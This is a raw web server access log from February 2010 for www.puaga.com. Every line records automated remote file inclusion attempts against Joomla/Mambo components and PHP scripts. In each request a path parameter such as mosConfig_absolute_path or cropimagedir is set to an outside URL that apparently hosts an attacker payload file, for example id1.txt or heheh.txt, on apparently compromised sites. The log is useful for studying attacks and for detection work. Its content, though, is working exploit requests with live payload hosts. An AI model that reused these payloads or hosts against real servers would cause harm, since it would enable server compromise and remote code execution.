219.94.193.152 - - [24/Feb/2010:04:38:04 -0800] "GET /artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:38:05 -0800] "GET /logs/access_100203.log/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:38:05 -0800] "GET /logs/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:38:06 -0800] "GET /artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:04:38:08 -0800] "GET /logs/access_100203.log/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:04:38:08 -0800] "GET /artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:04:38:08 -0800] "GET /logs/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:38:14 -0800] "GET /logs/access_100209.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:38:16 -0800] "GET /administrator/components/com_pollxt/pollxt.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:38:16 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/pollxt.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:38:16 -0800] "GET /logs//administrator/components/com_pollxt/pollxt.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:38:17 -0800] "GET /administrator/components/com_pollxt/pollxt.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:38:17 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/pollxt.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:38:18 -0800] "GET /logs//administrator/components/com_pollxt/pollxt.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:04:38:19 -0800] "GET /logs//index.php?option=com_serverstat&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:04:38:19 -0800] "GET /logs/access_100214.log//index.php?option=com_serverstat&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:04:38:19 -0800] "GET /index.php?option=com_serverstat&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:04:38:20 -0800] "GET /logs/access_100218.log//index.php?option=com_serverstat&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.244.236.248 - - [24/Feb/2010:04:38:43 -0800] "GET /logs/access_100218.log//index.php?option=com_serverstat&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.244.236.248 - - [24/Feb/2010:04:38:43 -0800] "GET /logs/access_100214.log//index.php?option=com_serverstat&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.244.236.248 - - [24/Feb/2010:04:38:43 -0800] "GET /logs//index.php?option=com_serverstat&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.244.236.248 - - [24/Feb/2010:04:38:43 -0800] "GET /index.php?option=com_serverstat&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:40:16 -0800] "GET /logs/access_100122.log%20%20/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:40:26 -0800] "GET /logs/access_100122.log%20%20/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [24/Feb/2010:04:40:47 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:41:07 -0800] "GET /logs/access_100122.log%20%20/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:41:33 -0800] "GET /logs/access_100122.log%20%20/artlinks.dispnew.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:43:39 -0800] "GET /logs/access_100216.log///?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:43:39 -0800] "GET /logs/access_100130.log///?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:43:58 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_pollxt/pollxt.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:44:00 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_pollxt/pollxt.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:44:17 -0800] "GET /cropcanvas.php?cropimagedir=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:44:17 -0800] "GET /logs//cropcanvas.php?cropimagedir=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:45:05 -0800] "GET /logs/access_100203.log%20%20//cropcanvas.php?cropimagedir=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:45:17 -0800] "GET /logs/access_100203.log//cropcanvas.php?cropimagedir=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:45:17 -0800] "GET /logs//cropcanvas.php?cropimagedir=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:45:17 -0800] "GET /cropcanvas.php?cropimagedir=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:45:39 -0800] "GET /logs/access_100214.log//cropcanvas.php?cropimagedir=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:46:03 -0800] "GET /cropcanvas.php?cropimagedir=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:46:03 -0800] "GET /logs//cropcanvas.php?cropimagedir=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:46:10 -0800] "GET /logs/access_100203.log//cropcanvas.php?cropimagedir=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:46:13 -0800] "GET /logs/access_100214.log%20%20//cropcanvas.php?cropimagedir=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:46:16 -0800] "GET /logs/access_100214.log//cropcanvas.php?cropimagedir=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [24/Feb/2010:04:46:54 -0800] "GET /logs/access_100121.log%20%20//?_zb_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [24/Feb/2010:04:46:54 -0800] "GET /logs//?_zb_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [24/Feb/2010:04:46:57 -0800] "GET /?_zb_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:47:01 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_pollxt/pollxt.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:47:01 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_pollxt/pollxt.inc.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:48:57 -0800] "GET /components/com_pollxt/languages/english.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:48:57 -0800] "GET /logs//components/com_pollxt/languages/english.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:48:57 -0800] "GET /logs/access_100123.log//components/com_pollxt/languages/english.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:48:59 -0800] "GET /components/com_pollxt/languages/english.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:48:59 -0800] "GET /logs//components/com_pollxt/languages/english.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:49:00 -0800] "GET /logs/access_100123.log//components/com_pollxt/languages/english.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:04:51:12 -0800] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:04:51:43 -0800] "GET /logs/access_100217.log/toolbar.phpshop.html.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:04:51:43 -0800] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:04:51:43 -0800] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:04:51:51 -0800] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:04:51:51 -0800] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:04:51:51 -0800] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:04:51:51 -0800] "GET /logs/access_100217.log%20%20/toolbar.phpshop.html.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:04:51:51 -0800] "GET /logs/access_100217.log%20%20/toolbar.phpshop.html.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:04:51:51 -0800] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:04:52:09 -0800] "GET /logs/access_100212.log/toolbar.phpshop.html.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:52:13 -0800] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:52:13 -0800] "GET /logs/access_100217.log%20%20/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:52:13 -0800] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:52:19 -0800] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:52:19 -0800] "GET /logs/access_100217.log/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:52:19 -0800] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [24/Feb/2010:04:52:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [24/Feb/2010:04:52:29 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [24/Feb/2010:04:52:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.244.236.248 - - [24/Feb/2010:04:52:31 -0800] "GET /logs//index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.244.236.248 - - [24/Feb/2010:04:52:31 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.244.236.248 - - [24/Feb/2010:04:52:32 -0800] "GET /index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:04:52:37 -0800] "GET /logs/access_100217.log/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [24/Feb/2010:04:52:41 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.244.236.248 - - [24/Feb/2010:04:52:51 -0800] "GET /logs/access_100217.log%20%20//index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:04:52:55 -0800] "GET /logs/access_100212.log%20%20/toolbar.phpshop.html.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:04:52:57 -0800] "GET /logs/access_100212.log%20%20/toolbar.phpshop.html.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:04:53:32 -0800] "GET /logs//index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:04:53:32 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:04:53:33 -0800] "GET /index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:53:35 -0800] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:53:38 -0800] "GET /logs/access_100217.log%20%20/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:53:39 -0800] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:53:43 -0800] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:53:43 -0800] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:53:43 -0800] "GET /logs/access_100217.log%20%20/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:53:54 -0800] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:53:54 -0800] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:53:54 -0800] "GET /logs/access_100217.log%20%20/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:54:08 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:54:08 -0800] "GET /logs/access_100123.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:54:08 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:54:11 -0800] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:54:15 -0800] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:54:15 -0800] "GET /logs/access_100217.log/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:54:16 -0800] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:54:16 -0800] "GET /logs/access_100217.log/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:54:17 -0800] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:04:54:27 -0800] "GET /logs/access_100217.log%20%20//index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:54:34 -0800] "GET /logs/access_100217.log/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:54:39 -0800] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:54:39 -0800] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:04:54:48 -0800] "GET /logs//index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:04:54:48 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
